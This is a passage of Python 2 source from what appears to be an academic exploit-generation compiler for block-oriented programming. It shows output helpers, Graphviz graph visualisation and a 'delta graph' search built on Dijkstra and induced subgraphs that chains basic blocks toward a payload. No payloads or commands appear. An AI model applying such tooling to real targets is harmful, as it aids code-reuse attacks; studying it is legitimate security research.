    print '\033[91m%s [FATAL]' % now(), err + '.\033[0m'
    exit( RETURN_FAILURE )


# -------------------------------------------------------------------------------------------------
# error(): This function is invoked when a non-fatal error occurs. It prints the error without
#       terminating the program.
#
# :Arg err: Error message to print
# :Ret: None.
#
def error( err ):
    print '\033[91m%s [ERROR]' % now(), err + '.\033[0m'
    

# -------------------------------------------------------------------------------------------------
# warn(): Print a warning.
#
# :Arg warning: Warning to print
# :Ret: None.
#
def warn( warn, lvl=DBG_LVL_0 ):
    if dbg_lvl >= lvl:                              # print only if you're in the right level
        print  '\033[93m%s [WARNING]' % now(),  warn + '.\033[0m'
    

# -------------------------------------------------------------------------------------------------
# warn(): Print an emphasized message.
#
# :Arg msg: Message to pring
# :Arg lvl: Message's debug level
# :Arg pre: Message prefix (OPTIONAL)# :Ret: None.
# :Ret: None.
#
def emph( msg, lvl=DBG_LVL_0 , pre='[*] '):
    # default mode is to print always
    if dbg_lvl >= lvl:                              # print only if you're in the right level
        print  '\033[0;32m%s' % now(), pre + msg + '\033[0m'


# -------------------------------------------------------------------------------------------------
# bold(): Emphasize a number (bold).
#
# :Arg num: Number to make bold
# :Arg ty: The type of the number (int / float)
# :Arg pad: Zero padding size (OPTIONAL)
# :Ret: The emphasized number.
#
def bold( num, ty='int', pad=None ):
    fms = 'd' if ty == 'int' else '.2f'           # select the format string (int / float)

    if not pad:
        return ("\033[1m%" + fms + "\033[21m") % num
    else:
        # this is a double format string (recursive)        
        return ("\033[1m" + (("%%%d" + fms) % pad) + "\033[21m") % num 


# -------------------------------------------------------------------------------------------------
# bolds(): Emphasize a string (bold).
#
# :Arg string: Message to make bold
# :Ret: The emphasized string.
#
def bolds( string ):
    return "\033[1m%s\033[21m" % string             # print in bold (and unbold)


# -------------------------------------------------------------------------------------------------
# rainbow(): Print a string with rainbow colors.
#
# :Arg string: Message to make rainbow.
# :Ret: None.
#
def rainbow( string ):
    RED     = lambda key : "\033[91m%c\033[0m" % key
    GREEN   = lambda key : "\033[92m%c\033[0m" % key
    YELLOW  = lambda key : "\033[93m%c\033[0m" % key
    MAGENTA = lambda key : "\033[95m%c\033[0m" % key
    CYAN    = lambda key : "\033[96m%c\033[0m" % key
   
    return ''.join([{ 0 : RED, 
                      1 : CYAN, 
                      2 : YELLOW, 
                      3 : MAGENTA, 
                      4 : GREEN 
                    }[ ctr % 5 ](ch) for ctr, ch in enumerate(string)])


# -------------------------------------------------------------------------------------------------

''' =========================================================================================== '''
'''                                GRAPH VISUALIZATION FUNCTIONS                                '''
''' =========================================================================================== '''

# -------------------------------------------------------------------------------------------------
# Visualizing Options (VO)
# -------------------------------------------------------------------------------------------------
VO_NONE            = 0x0000                         # no visualization
VO_TYPE_CFG        = 'cfg'                          # visualizion mode: CFG
VO_TYPE_DELTA      = 'delta'                        # visualizion mode: delta graph
VO_TYPE_CAPABILITY = 'cap'                          # visualizion mode: capability graph
VO_CFG             = 0x0080                         # visualize CFG
VO_CAND            = 0x0040                         # visualize candidate blocks
VO_ACC             = 0x0010                         # visualize accepted blocks
VO_CLOB            = 0x0020                         # visualize clobbering blocks
VO_PATHS           = 0x1000                         # draw execution paths (i.e., dispathcers)
VO_DRAW_INF_EDGES  = 0x2000                         # draw edges with infinite weight


# -------------------------------------------------------------------------------------------------
# _node_colors(): Color a node properly.
#
# :Arg graph: The name of the generated file.
# :Ret: If the graph is visualized successfully function returns True. Otherwise it returns
#       False.
#
class _node_colors( object ):

    # ---------------------------------------------------------------------------------------------
    #
    #
    #
    def __init__( self ):
        self.__colormap = dict()

    # ---------------------------------------------------------------------------------------------
    # 
    #
    #
    def __setitem__( self, color, nodeset ):
        for node in nodeset:
            self.__colormap[ node ] = color

    # ---------------------------------------------------------------------------------------------
    # 
    #
    #
    def __iter__( self ):
        for node, color in self.__colormap.iteritems():
            yield (node, color)

    # ---------------------------------------------------------------------------------------------
    # 
    #
    #
    def __contains__( self, node ):
        return node in self.__colormap

    # ---------------------------------------------------------------------------------------------
    # 
    #
    #
    def get_nodes( self ):
        return self.__colormap.keys()


# -------------------------------------------------------------------------------------------------


# -------------------------------------------------------------------------------------------------
# __get_dg_layers(): Get delta graph layers.
# 
# :Arg delta_graph: The delta graph
# :Ret: the list of the layers.
#
def __get_dg_layers( delta_graph ):
    return sorted( list(set([uid for uid,_ in delta_graph.nodes()])) )
    

# -------------------------------------------------------------------------------------------------
# __get_dg_layer_nodes(): Get the nodes from a delta graph layer.
#
# :Arg delta_graph: The delta graph
# :Arg layer_id: Layer to return
# :Ret: the list of nodes for the specified layer.
#
def __get_dg_layer_nodes( delta_graph, layer_id ):
    return sorted([addr for uid, addr in delta_graph.nodes() if uid == layer_id])
      

# -------------------------------------------------------------------------------------------------
# visualize(): Visualize a graph and save it into a (pdf) file. This function supports a
#       number of options to customise the visualization.
#
# :Arg filename: The name of the generated file.
# :Arg entry: The entry point that trace searching algorithm starts
# :Arg options: An integer that describes how the CFG should be visualized. It can be the 
#       logical OR of one or more of the following:
#
#       VO_NONE            | Do not do anything (Default)
#       VO_DRAW_CFG        | Draw the CFG
#       VO_DRAW_CANDIDATE  | Draw all candidate blocks
#       VO_DRAW_ACCEPTED   | Draw all accepted blocks
#       VO_DRAW_CLOBBERING | Draw all clobbering blocks
#       VO_DRAW_SE_PATHS   | Draw the symbolic execution paths (if any)
#       VO_SHOW_LABELS     | Show labels for blocks (their address in hex)
#       VO_HIDE_EDGES      | Do not draw any edges
#       VO_NO_FAKERET      | Do not draw the "fakeret" edges
#
# :Arg paths: If VO_DRAW_SE_PATHS is set, this argument is a list of the paths to draw
# :Ret: If the CFG is visualized successfully function returns True. Otherwise it returns
#       False.
#
def visualize( graph, gtype='', options=VO_NONE, entry=-1, filename=None, paths=set(), cur_uid=0, 
               func=None ):
                   
    G = Digraph('G', format='svg', filename=filename)

    nodes      = _node_colors()
    nodeset    = set()
    path_edges = { }
    path_nodes = set()

    '''
    if options & VO_DRAW_SE_PATHS:              # show 
        edges = []

        # convert paths (a, b, c, d) to edge sets ((a,b), (b,c), (c,d))
        for path in paths:
            u = path[0]
            
            for v in path[1:]:
                edges.append( (u, v) )
                u = v


        # draw all edges 
        nx.draw_networkx_edges(G, pos, edgelist=edges,
             edge_color='red', style='solid', arrows=False, width=1, alpha=1)
    '''

    if options & VO_PATHS:
        #   for path in paths:
        #       for u in path:
        #           path_nodes.add(u)
        #
        #   for u, v in zip(path, path[1:]):
        #        path_edges[ (u, v) ] = 1

        path_edges = paths


    # ---------------------------------------------------------------------
    # Control Flow Graph
    # ---------------------------------------------------------------------
    if gtype == VO_TYPE_CFG:
        # -------------------------------------------------------------------------------
        # First identify the set of nodes (along with the color) to visualize
        # -------------------------------------------------------------------------------

        # -------------------------------------------------------------------------------
        if options & VO_CFG:
            for node in graph.nodes():
                if func and node.addr not in func.block_addrs:
                    continue

                G.node('%x' % node.addr, fillcolor='white', shape='box', style='filled')
                nodeset.add(node.addr)

        # -------------------------------------------------------------------------------
        if options & VO_CAND:
            # nodes['yellow' ] = get_nodes('cand')
            # (<CFGNode frame_dummy+0x1f 0x40078fL[6]>, [(14, [...]), (16, [...])]),

            for node, attr in nx.get_node_attributes(graph, 'cand').iteritems():

                if func and node.addr not in func.block_addrs:
                    continue

                G.node('%x' % node.addr, label='%x' % node.addr,
                        # label='%x\n%s' % (node.addr, ', '.join(['%d' % uid[0] for uid in attr])),
                        fillcolor='yellow', shape='box', style='filled')

                nodeset.add(node.addr)

        # -------------------------------------------------------------------------------
        if options & VO_ACC:
            # nodes['lawngreen'] = ['0x%x\n%s' % (n.addr, ', '.join([str(x) for x in s]))
            #                           for n, s in get_attr('acc')]
            #
            # (<CFGNode main+0x141 0x4009c6L[17]>, [14])
            # print [(n,s) for n, s in get_attr('acc')]
           
            for node, attr in nx.get_node_attributes(graph, 'acc').iteritems():
                if func and node.addr not in func.block_addrs:
                    continue

                G.node('%x' % node.addr, label='%x' % node.addr,
                        # label='%x\n%s' % (node.addr, ', '.join(['%d' % uid for uid in attr])),                            
                        # fillcolor='lawngreen',
                        shape='doubleoctagon', style='filled, bold')

                nodeset.add(node.addr)

        # -------------------------------------------------------------------------------
        if options & VO_CLOB:        
            # nodes['orangered'] = ['0x%x\n%s' % (n.addr, ', '.join([str(x) for x in s])) 
            #                           for n, s in get_attr('clob')]
            #
            # (<CFGNode _init 0x4005d0[16]>, set([16, 14])),
            # print [(n,s) for n, s in get_attr('clob')]

            for node, attr in nx.get_node_attributes(graph, 'clob').iteritems():

                if func and node.addr not in func.block_addrs:
                    continue

                G.node('%x' % node.addr, label='%x' % node.addr,
                        # label='0x%x\n%s' % (node.addr, ', '.join(['%d' % uid for uid in attr])),                            
                        fillcolor='orangered', shape='box', style='filled')

                nodeset.add(node.addr)


        # -------------------------------------------------------------------------------
        # Entry point
        # -------------------------------------------------------------------------------
        if entry != -1:
            G.node('%x' % entry, shape='box')  #, style='filled', fillcolor='gray')                
            

        # -------------------------------------------------------------------------------
        # Then, draw the edges
        # -------------------------------------------------------------------------------

        # subgraph = graph.subgraph( nodes.get_nodes() )    
        # print graph.nodes()

        for u, v in graph.edges_iter():
            #   if u.addr in nodes and v.addr in nodes:
            #       G.edge('0x%x' % u.addr, '0x%x' % v.addr)

            if u.addr in nodeset and v.addr in nodeset:
                if (u.addr, v.addr) in path_edges:
                    pass
                    # G.edge('0x%x' % u.addr, '0x%x' % v.addr, #label='%d' % path_edges[u.addr, v.addr],
                    #        color='deepskyblue', style='setlinewidth(3)', font='Arial Black', 
                    #        fontsize='30'#, fontcolor='purple'
                    # )
                else:
                    G.edge('%x' % u.addr, '%x' % v.addr)


        for (u, v) in path_edges:
            path_nodes.add( u )
            path_nodes.add( v )

        for (u, v) in path_edges:
            G.edge('%x' % u, '%x' % v, # label='%d' % path_edges[u.addr, v.addr],
                    color='blue', style='setlinewidth(5)', font='Arial Black', 
                    fontsize='30', fontcolor='purple'
            )
  
        '''
        G.node('foo', label='', shape='doubleoctagon', fillcolor='white', style='filled, bold')
        G.node('bar', label='      ', shape='ellipse')
        G.node('baz', label='', shape='box')

        G.node('A', label='', color='white', fillcolor='white')
        G.node('B', label='', color='white', fillcolor='white')

        G.edge('A', 'B', color='blue', style='setlinewidth(5)')
        '''


    # -----------------------------------------------------------------------------------
    # Delta Graph
    # -----------------------------------------------------------------------------------
    elif gtype == VO_TYPE_DELTA:
        # add invisible edges between layers to align them
        for layer_from, layer_to in to_edges(__get_dg_layers(graph)):
            nodes_1 = __get_dg_layer_nodes(graph, layer_from)
            nodes_2 = __get_dg_layer_nodes(graph, layer_to)            

            # skip some nodes from the first layer (too many)
            # whitelist = [0x41dfe3, 0x41e02a, 0x407a1c, 0x403d4b, 0x403d6c, 0x407887, 0x404D5A]

            if layer_from == 2:
                nodes_1 = [n for n in nodes_1 if n in whitelist]
           
            if layer_to == 2:
                nodes_2 = [n for n in nodes_2 if n in whitelist]
 
            for n in nodes_1:
                for m in nodes_2:                      
                    G.edge('%d-%x' % (layer_from, n), '%d-%x' % (layer_to, m), color='transparent')


        # test edges
        #
        # G.edge('6-403e4e', '16--1', color='transparent')
        # G.edge('6-403fd9', '16--1', color='transparent')
        #
        # G.node('6-999999', color='transparent', fontcolor='transparent')

        for node in graph.nodes():
            print node, graph.in_degree(node), graph.out_degree(node)
            uid, addr = node

            # skip some nodes from the first layer (too many)
            if uid == 2 and addr not in whitelist:
                print '\tDROP!'
                continue

            with G.subgraph(name='cluster_%d' % uid) as c:
                
                c.node_attr.update(style='filled', color='white')

                # c.edges([('a0', 'a1'), ('a1', 'a2'), ('a2', 'a3')])
                # c.attr(label='UID: %d' % uid, labelloc='t' if uid == 0 else 'b' )
                c.attr(label='Statement #%d' % uid, style='setlinewidth(3)', color='gray35',
                        labeljust='l', labelloc='t', fontcolor='gray35')

                ''' 
                good = 0

                for n in graph.in_edges(node):
                    if graph[n[0]][node]['weight'] != INFINITY:
                        good += 1
                
                for n in graph.out_edges(node):
                    if graph[node][n[1]]['weight'] != INFINITY:
                        good += 1

                if good:
                    c.node('%d-%x' % (uid, addr), label='0x%x' % addr)
                '''
               
                c.node('%d-%x' % (uid, addr), font='Arial Black', 
                        label=('%x' % addr) if addr > 0 else '    -1    ')


                # G.node('%d-%x' % (uid, addr), fillcolor='white', shape='box', style='filled')                
                

        dbg_arb(DBG_LVL_2, "Path Edges:", path_edges)

        for u, v, w  in graph.edges(data=True):
            print 'Edge', u, ' -> ', v
            
            if (u, v) in path_edges:
                G.edge('%d-%x' % u, '%d-%x' % v, label=('%d' % w['weight']) if v[0] != 16 else '0',
                        color='blue', style='setlinewidth(3)', font='Arial Black', 
                        fontsize='14', fontcolor='blue', constraint='false' 
                )

                G.node('%d-%x' % u, color='blue', fontcolor='blue', style='setlinewidth(3)')
                G.node('%d-%x' % v, color='blue', fontcolor='blue', style='setlinewidth(3)')

            else:
                if u[0] == 2 and u[1] not in whitelist:
                    continue

                if v[0] == 2 and v[1] not in whitelist:
                    continue

                if v[0] == 16:
                    G.edge('%d-%x' % u, '%d-%x' % v, fontsize='14', label='0', constraint='false' )    
                
                elif w['weight'] != INFINITY:
                    G.edge('%d-%x' % u, '%d-%x' % v, fontsize='14', label='%d' % w['weight'], 
                            constraint='false' )    

                elif options & VO_DRAW_INF_EDGES:
                    G.edge('%d-%x' % u, '%d-%x' % v, label='INF', constraint='false' )    
        pass


    # -------------------------------------------------------------------------
    # Capability Graph
    # ------------------------------------------------------------------------- 
    elif gtype == VO_TYPE_CAPABILITY:
        # TODO: 1. Elaborate on call, etc.
        #       2. No edge with weigth=0 on stmt on the same addr

        get_attr  = lambda attr  : nx.get_node_attributes(graph, attr).iteritems()
        get_nodes = lambda blkty : set([n.addr for n, _ in get_attr(blkty)])
        get_stmt  = lambda stmt  : set([n for n, s in get_attr('type') if s == stmt])


        for node, attr in graph.nodes(data=True):            
            color = {
                'regset' : 'whitesmoke',
                'regmod' : 'limegreen',
                'call'   : 'turquoise2',
                'cond'   : 'maroon1'
            }[ attr['type'] ]

            G.node('%d' % node, label='0x%x\n%d - %s' % (attr['addr'], node, attr['type']),
                fillcolor=color, shape='box', style='filled')
     
        for u, v, w in graph.edges_iter(data=True):
            G.edge('%d' % u, '%d' % v, label='%d' % w['weight'])
   

    # ---------------------------------------------------------------------
    # Save results to file
    # --------------------------------------------------------------------- 
    #  G.view()
    
    try:
        G.save(filename + '.dot')
        G.render(filename, view=True)
    except IOError, err:
        error("Cannot save figure: %s" % str(err))
        return False                            # failure

    dbg_prnt(DBG_LVL_1, "Done. Graph saved as %s" % filename + '.pdf')
 
    return True


# -------------------------------------------------------------------------------------------------


================================================
FILE: source/delta.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# delta.py:
#
# This module is also the "assistant" of the symbolic execution engine along with the path module.
# It implements the Delta Graph (DG). More details on the paper :)
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
import path as P

import networkx as nx
import queue
import heapq


# ------------------------------------------------------------------------------------------------
# Constant Definitions
# ------------------------------------------------------------------------------------------------
# _NULL_NODE = -1                                     # null (non-existent) node
_SINK_NODE = 0                                      # the sink node in delta graph
    

# -------------------------------------------------------------------------------------------------
# _delta(): This class creates and processes the delta graph. Delta graph shows the distances 
#   (deltas) between accepted blocks.
#
class delta( P._cs_ksp_intrl ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''
        
    # ---------------------------------------------------------------------------------------------
    # __dijkstra_av(): This function finds the shortest path between source and destination 
    #       vertices using Dijkstra's algorithm. What's special about this algorithm, is that it
    #       avoids all vertices and edges that have the "avoid" attribute set. 
    #
    # :Arg src: The source node
    # :Arg dst: The destination node
    # :Ret: A tuple (dist, path) that contains the shortest distance and the shortest path as a 
    #   list of vertices. If such a path does not exist, function retuns (-1, []).
    #
    def __dijkstra_av( self, src, dst, extra=None ):
        Q = queue.PriorityQueue()                   # implement it using a prioirty queue
        dist, prev = { }, { }                       # intialize maps        
        

        if 'avoid' in self.__d.node[ src ]:         # if source vertex must be avoided,
            return -1, []                           # abort


        for vtx, _ in self.__d.nodes_iter(data=True):
            if vtx != src:                          # for all vertices except source
                dist[vtx], prev[vtx] = INFINITY, -1 # initialize distances to INF
 

        # TODO: REPLACE PRIORITY QUEUE OBJECTS
        dist[src], prev[src] = 0, _NULL_NODE        # source has distance 0
        Q.put(src, dist[src])                       # add source vertex to the queue        
    
        ''' ------------------------------------------------------------------------- '''
        ''' Main loop                                                                 '''
        ''' ------------------------------------------------------------------------- '''
        while not Q.empty():                        # while there are vertices in the queue
            u = Q.get()                             # extract best vertex

            if u == dst:                            # destination vertex found?
                path, v = [], u                     # initialize vars
                                
                while v != _NULL_NODE:              # repeat until you reach the source
                    path.insert(0, v)               # add vertex in reverse order
                    v = prev[v]                     # move backwards

                return dist[u], path                # success! return (dist,path)
                

            for v in self.__d.neighbors(u):         # for each adjacent vertex

                # if this vertex or its edge must to be avoided, skip it
                if 'avoid' in self.__d.node[ v ] or 'avoid' in self.__d[ u ][ v ]:
                    continue


                altd = dist[u] + self.__d[u][v]['weight']               
                if altd < dist[v]:                  # if alternative path is shorter
                    dist[v] = altd                  # use it
                    prev[v] = u
                    
                    Q.put( v, altd )                # and add it to the queue


        return -1, []                               # no path. Failure

    '''
    # ---------------------------------------------------------------------------------------------
    # __cost(): Calculate the cost of a given path.
    #
    # :Arg path: Path to work on
    # :Ret: An integer containing path's distance (cost).
    #
    def __cost( self, path ):
        cost = 0
    
        if len(path) > 1:
            for i in range(len(path) - 1):          # for each vertex in the path                           
                cost += self.__d.edge[ path[i] ][ path[i + 1] ]['weight']

        return cost
    '''
    
    # ---------------------------------------------------------------------------------------------
    # maxheap_obj: This class represents maximum-heap objects
    # ---------------------------------------------------------------------------------------------
    class __maxheap_obj( object ):
        def __init__( self, tw, Hk ):           # store total weight and induced subgraph
            self.tw = tw; self.Hk = Hk
        
        def __eq__( self, obj ):                # == operator: Compare total weights
            return self.tw == obj.tw
        
        def __lt__( self, obj ):                # < operator: Invert condition
            return self.tw > obj.tw             # with this trick min-heap becomes max-heap


    # ---------------------------------------------------------------------------------------------
    # __enum_induced_subgraphs(): Enumerate all induced subgraphs with k nodes. Keep track of the
    #   K minimum subgraphs by storing them on a max-heap. This function is recursive.
    #
    #   NOTE /!\: Although this function has an exponential worst case complexity, in practice,
    #       delta graphs are sparse so many of the combinations are truncated at the early stages.
    #       In other words, this function is fast in practice.
    #
    # :Arg depth: The current recursion depth
    # :Arg V: The current set of nodes that constitute the induced subgraph
    # :Ret: None.
    #
    #
    #   
    # TODO: Optimization: When delta graph is flat, use Dijkstra
    # 
    def __enum_induced_subgraphs( self, depth, V ):
        # ---------------------------------------------------------------------
        if depth == len(self.__bound):              # do we have a k-node induced subgraph      
            Hk = nx.DiGraph()                       # Create the induced subgraph
            Hk.add_nodes_from( V )

            Vs = set(V)                             # cast list to set to optimize searching
            tw = 0

            # iterate over edges in __G and keep those who have both edges in the subgraph
            for (u, v, w) in self.__G.edges_iter(data='weight'):
                if u in Vs and v in Vs:

                    # Induced subgraph nodes are indexed using (uid, addr) tuples
                    Hk.add_edge(u, v, visited=False)
                    tw += w                         # update total weight
                    
            if tw >= INFINITY:                      # discard subgraphs with INFINITY-weight edges
                return 0

            dbg_arb(DBG_LVL_3, "Induced subgraph (Total Weight: %2d) found" % tw, V)


            if self.__k > 0:                        # if heap doesn't have enough subgraphs
                heapq.heappush(self.__heap, self.__maxheap_obj(tw,Hk))
                self.__k -= 1
            else:                                   # otherwise keep the K minimum weight subgraphs
                if self.__heap[0].tw >= tw:
                    heapq.heappushpop(self.__heap, self.__maxheap_obj(tw,Hk))


            # Enumerating all induced subgraphs can take O(2^n) time. Although we truncated many
            # solutions, the worst case complexity is still remains.
            #
            # Therefore, if we hit an upper bound we simply stop the enumeration

            self.__inc_ctr += 1
            if MAX_ALLOWED_INDUCED_SUBGRAPHS != -1 and \
                self.__inc_ctr >= MAX_ALLOWED_INDUCED_SUBGRAPHS:
                    return -1                           # maximum number of tries reached

            return 0


        # we always start from depth 1 (we have a single entry point)
        cur = V[depth - 1]
        uid = self.__uid[depth]


        # ---------------------------------------------------------------------
        for n in range(self.__bound[depth]):        # for each block in the current depth

            # At this point we should check whether the selected node has an non-infinity
            # distance with the others. This check is crucial as it can quickly eliminate
            # most of the induced subgraphs.
            #
            # TODO: Elaborate.
            #

            nxt = self.__node_groups[depth][1][n]

            #print self.__uid[depth], (cur, nxt)
            #print self.__adj[ uid ]
            #print self.__radj[ self.__uid[depth] ]

            discard = False


            # To problem here is the non-linearity. Although we're moving from depth X to X+1,
            # it doesn't means that we're going from statement X to X+1.
            #
            # The idea is when add node X+1, to check whether all incoming edges (from already 
            # visited nodes) have non-infinity cost and whether all outgoing edges (from already 
            # visited nodes too) have non-infinity cost as well
            #

            if uid in self.__radj:                  # do the same with incoming edges
                for x in self.__radj[ uid ]:
                    y = self.__uid.index(x)

                    if y >= depth:
                        continue


                    if not self.__G.has_edge(V[y], (uid,nxt)) or \
                        self.__G.get_edge_data(V[y], (uid,nxt))['weight'] == INFINITY:

                            discard = True          # discard current solution
                            break

            if uid in self.__adj and not discard:   # check outgoing edges
                for x in self.__adj[ uid ]:         # for each neighbor of of the next node
                    y = self.__uid.index(x)         # check if it's already in visited

                    if y >= depth:                  # TODO: >= or > ?
                        continue                    # skip if not

                    if not self.__G.has_edge((uid,nxt), V[y]) or \
                        self.__G.get_edge_data((uid,nxt), V[y])['weight'] == INFINITY:
                            discard = True
                            break


            # if self.__G.get_edge_data(V[depth], 
            #                           self.__node_groups[depth][1][nxt])['weight'] != INFINITY:
            if not discard:                
                # recursively move on
                if self.__enum_induced_subgraphs(depth + 1, V + [(uid,nxt)]) < 0:
                    warn('Maximum number of induced subgraphs has been reached. '
                         'Much Sad. Giving up recursing')
                    return -1                       # quickly escape from recursions

            # Node didn't work out. Try another one.

        return 0


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor. Create delta graph delta(CFG, M_v)
    #
    # :Arg graph: CFG to work on
    # :Arg entry: Payload's entry point
    # :Arg accepted: Dictionary of accepted blocks
    # :Arg clobbering: Dictionary of clobbering blocks
    # :Arg adj: Dictionary of the adjacency lists for accepted blocks
    #
    def __init__( self, graph, entry, accepted, clobbering, adj):
        """
        # A sample graph to test things

        self.__G = nx.DiGraph()
        self.__G.add_nodes_from( ['e', 'A1', 'B1', 'B2', 'B3', 'C1', 'D1', 'D2'] )

        self.__G.add_edge( 'e',  'A1', weight=0)
        self.__G.add_edge( 'A1', 'B1', weight=30)
        self.__G.add_edge( 'A1', 'B2', weight=2)
        self.__G.add_edge( 'A1', 'B3', weight=4)

        self.__G.add_edge( 'B1', 'C1', weight=1)
        self.__G.add_edge( 'B2', 'C1', weight=2)
        self.__G.add_edge( 'B3', 'C1', weight=3)

        self.__G.add_edge( 'C1', 'D1', weight=2)
        self.__G.add_edge( 'C1', 'D2', weight=1)

        self.__G.add_edge( 'D1', 'A1', weight=5)        
        self.__G.add_edge( 'D2', 'A1', weight=4)
        self.__G.add_edge( 'D2', 'B2', weight=1)

        self.__G.add_edge( 'D1', 'B1', weight=INFINITY)
        self.__G.add_edge( 'D1', 'B2', weight=INFINITY)
        self.__G.add_edge( 'D1', 'B3', weight=INFINITY)
        self.__G.add_edge( 'D2', 'B1', weight=INFINITY)
        self.__G.add_edge( 'D2', 'B3', weight=INFINITY)

        self.__node_groups = accepted

        # if you use the sample graph, use these node groups
        self.__node_groups = [(0, ['e']), (6, ['A1']), (8, ['B1', 'B2', 'B3']), (10, ['C1']), 
                                (14, ['D1', 'D2'])]

        adj       = { }
        adj[0 ]   = [6]
        adj[ 6 ]  = [8]
        adj[ 8 ]  = [10]
        adj[ 10 ] = [14]
        adj[ 14 ] = [6, 8]

        # self.__G.node['C']['avoid'] = 1
        print self.__G.edges()  
        print accepted
        print adj

        self.__entry = 'e'
        self.__adj   = adj                          # store adjacency list

        return

        """
        dbg_prnt(DBG_LVL_1, "Creating Delta Graph...")


        assert(MAX_ALLOWED_INDUCED_SUBGRAPHS != 0)

        self.__adj = adj                            # store adjacency list
        self.__node_groups = accepted

        self.__d = nx.DiGraph()                     # the delta graph       
        self.__entry = entry                        # payload's entry point

        super(self.__class__, self).__init__(
            self.__d, 
            self.__dijkstra_av, 
            # TODO: USE SPUR_DIJKSTRA ;) <--- No b/c we use induced subgraphs?
            lambda node : node                      # identity function (access graph directly)
        )

        # object for CFG shortest paths
        # cfg = P._cfg_shortest_path(graph, clobbering, adj)

        blacklist = set()                           # blacklisted nodes from Delta Graph


        # build the reverse adjacency list
        self.__radj = { }

        for a, b in self.__adj.iteritems():
            for c in b:
                self.__radj.setdefault(c, []).append(a)


        ''' ------------------------------------------------------------------------- '''
        ''' Main loop                                                                 '''
        ''' ------------------------------------------------------------------------- '''
        # self.__d.add_node(entry)                  # add entry node

        # Easter Egg: When entry is None, skip it and start directly from the 1st accepted block.
        if entry != -1 and entry not in ADDR2NODE:  # check if entry point is valid
            raise Exception('Entry point not found')


        # for _, nxt in sorted(accepted.iteritems()):   # for each next level
        for uid, cur in accepted:                   # for each next level

            # if any node is not a valid basic block address, abort
            if len(filter(lambda n : n not in ADDR2NODE and n != -1, cur)): 
                raise Exception('Node is not a valid address')


            # filter out ndoes from current set
            cur = [node for node in cur if (uid, node) not in blacklist]

            
            # The problem: It's possible for an accepted block, to be accepted for >1 statements.
            # If we index nodes in Delta Graph using block addresses, we will end up reusing the
            # same node at different "levels". 
            #
            # To avoid this situation, we index nodes using a tuple (uid, address). 
            #
            self.__d.add_nodes_from( zip([uid]*len(cur), cur) )

                       
            if uid not in self.__adj:               # the last layer (statement) has no neighbors
                continue


            for nxt in self.__adj[ uid ]:
                # accepted = [(0, [4196485]), (6, [4197081L, 4196382]), ..., (24, [4196485])]

                # get set of accepted blocks for the next statement
                nxt_set2 = [b for (a, b) in accepted if a == nxt][0]

                dbg_prnt(DBG_LVL_3, "Delta Graph edges from (%d) '%s' to (%d) '%s'" %
                                        (uid, pretty_list(cur, ', '), 
                                         nxt, pretty_list(nxt_set2, ', ')))


                nxt_set = [node for node in nxt_set2 if (nxt, node) not in blacklist]
             
                # if len(nxt_set) != len(nxt_set2):
                #     warn('REDUCE FROM %d to %d' %(len(nxt_set2), len(nxt_set)))


                # fully connect nodes from current to the next level (quadratic complexity)
                for c in cur:                           # for each node in current level
                    # print '-------------------------------------'
                    
                    # find paths to all nodes in the next level        
                    cfg = P._cfg_shortest_path(graph, clobbering, adj)
                    path = cfg.shortest_path(c, nxt_set, uid)

                    # backdoor 2: wildcard return
                    if len(nxt_set) == 1 and nxt_set[0] == -1: 
                        self.__d.add_edge((uid, c), (nxt, nxt_set[0]), weight=1)
                        warn('ADD a wildcard return statement')
                        del cfg
                        continue


                    # print '======================================='
                    for n in range(len(nxt_set)):       # for each node in the next level
                        # add an edge with cost their distance in CFG (or INF if edge does not exist)

                        
                        # Easter Egg checking
                        if c == entry and entry == -1: 
                            self.__d.add_edge((uid, c), (nxt, nxt_set[n]), weight=0)                    

                        # if next statement is on the same basic block
                        # but next UID is smaller than current (we move backwards)
                        elif c == nxt_set[n] and uid >= nxt:

                            # find a loop (not a 0-distance path)
                            loop, _ = cfg.shortest_loop(c, uid)

                            self.__d.add_edge((uid, c), (nxt, nxt_set[n]), 
                                        weight=loop if loop >= 0 else INFINITY)
                            pass

                        else:
                            # self.__d.add_edge(c, nxt_set[n], weight=path[n][0] \
                            #                           if path[n][0] >= 0  else INFINITY)
                            #    

                            self.__d.add_edge((uid, c), (nxt, nxt_set[n]), 
                                    weight=path[n][0] if path[n][0] >= 0 else INFINITY)

                            pass

                    del cfg


                # -------------------------------------------------------------
                # Optimization:
                #
                # Check if any nodes are totally disconnected from the previous
                # layer. If so, they cannot be part of an induced subgraph, and
                # therefore we can remove them.
                # -------------------------------------------------------------
                for n in range(len(nxt_set)):

                    good = False

                    for c in cur:
                        if self.__d.has_edge((uid, c), (nxt, nxt_set[n])) and \
                            self.__d[(uid, c)][(nxt, nxt_set[n])]['weight'] != INFINITY:
                                # n has at least one edge to the previous layer
                                good = True

                    if not good and self.__d.has_node( (nxt, nxt_set[n]) ):
                    #    warn('edge (%d, %x) - (%d, %x) is missing. Add to blacklist.' % 
                    #           (uid, c, nxt, nxt_set[n]))
                        self.__d.remove_node((nxt, nxt_set[n]))
                        blacklist.add( (nxt, nxt_set[n]) )


        '''
        # NOTE: This is for flat delta graphs, where statement i goes to i+1

        for a, nxt in accepted:                     # for each next level

            print 'nxt', cur, nxt, a
            # if any node is not a valid basic block address, abort
